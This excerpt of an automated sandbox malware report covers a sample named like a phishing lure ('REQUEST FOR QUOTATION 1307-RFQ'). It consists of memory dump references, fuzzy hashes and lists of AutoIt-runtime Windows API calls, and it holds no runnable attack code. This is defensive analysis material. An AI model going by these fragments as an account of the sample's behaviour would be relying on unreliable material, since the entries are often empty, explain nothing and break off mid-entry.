                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6e9c3ac973c5e9a51865d1721f109c75db197d66ddd79a9c8b2bc976c3118f7c
                                                                                                                                                                                                                              • Instruction ID: a423c3ad947af824382806614946e645d202bbec00e2920b6f691fad63162796
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e9c3ac973c5e9a51865d1721f109c75db197d66ddd79a9c8b2bc976c3118f7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C86101359287A48BC322AB3EE85127AB394FFD6384F55C73EEA8573A90DF3415068344
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3141e6a6717ab837139ccc4d9bae5c60cc8ef9d05d27da731f86db07a0f878c9
                                                                                                                                                                                                                              • Instruction ID: 6df41292551818b7a52ece23d0c048ec7100591f3d83da5b203e7359e1de08ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3141e6a6717ab837139ccc4d9bae5c60cc8ef9d05d27da731f86db07a0f878c9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A941C3306083958FC728EF6AE8E067BB3D1FBC9315F65493ED6C683280CA386419CB51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                                                                                                                                                                              • Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                                                                                                                                                                              • Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                                                              • Instruction ID: be6d0a0a496cc30f16a40e63a1b5a49ddf58b02edd461fab227884a0814f4f1c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A241D571D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                                              • Instruction ID: e70bc46a9fc6878994ace62bbd033b90b2da1840d546e4f8715251e6dfd53b5d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2019D78A00209EFCB44DF99C5949AEF7B5FB4C310F208699E919A7341D730AF41DB80
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                                              • Instruction ID: 92fb82b04009335332b9b6b9116af8bf9d14ebcc26772fb9aca8f7329e6df637
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB018079A00249EFCB44DF98C5949AEF7B5FB48310F208599E819A7741D730AF41DB80
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0048364B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                                                                                                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                                                                              • API String ID: 4105515805-45149045
                                                                                                                                                                                                                              • Opcode ID: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                                                                                                                                                                                                                              • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                                                                                                                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                                                                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                                                                                                                                                                                              • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                                                                                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                                                                                                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                                                                                                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                                                                                                                                                                                              • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                                                                                                                                                                • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3521893082-0
                                                                                                                                                                                                                              • Opcode ID: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                                                                                                                                                                                                                              • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                                                                                                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                                                                                                                                                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 464785882-4108050209
                                                                                                                                                                                                                              • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                                                                                                                                                              • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                                                                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                                                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                                                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                                                                                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004777A6
                                                                                                                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                                                                                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                                                                                                              • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                                                                                                                                                                                              • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                              • Opcode ID: dc875c7f23c7d0eb2fd9c9e49e05cbe8264abdead4ae9aa7525ba1e7fefde2ed
                                                                                                                                                                                                                              • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc875c7f23c7d0eb2fd9c9e49e05cbe8264abdead4ae9aa7525ba1e7fefde2ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __wcsnicmp
